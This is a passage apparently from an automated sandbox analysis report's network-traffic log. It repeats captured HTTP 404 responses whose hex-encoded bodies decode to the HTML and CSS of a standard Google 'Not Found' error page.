70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Tue, 29 Oct 2024 12:08:43 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Tue, 29 Oct 2024 12:08:45 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Tue, 29 Oct 2024 12:08:51 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Tue, 29 Oct 2024 12:08:53 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Tue, 29 Oct 2024 12:08:55 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Tue, 29 Oct 2024 12:09:01 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 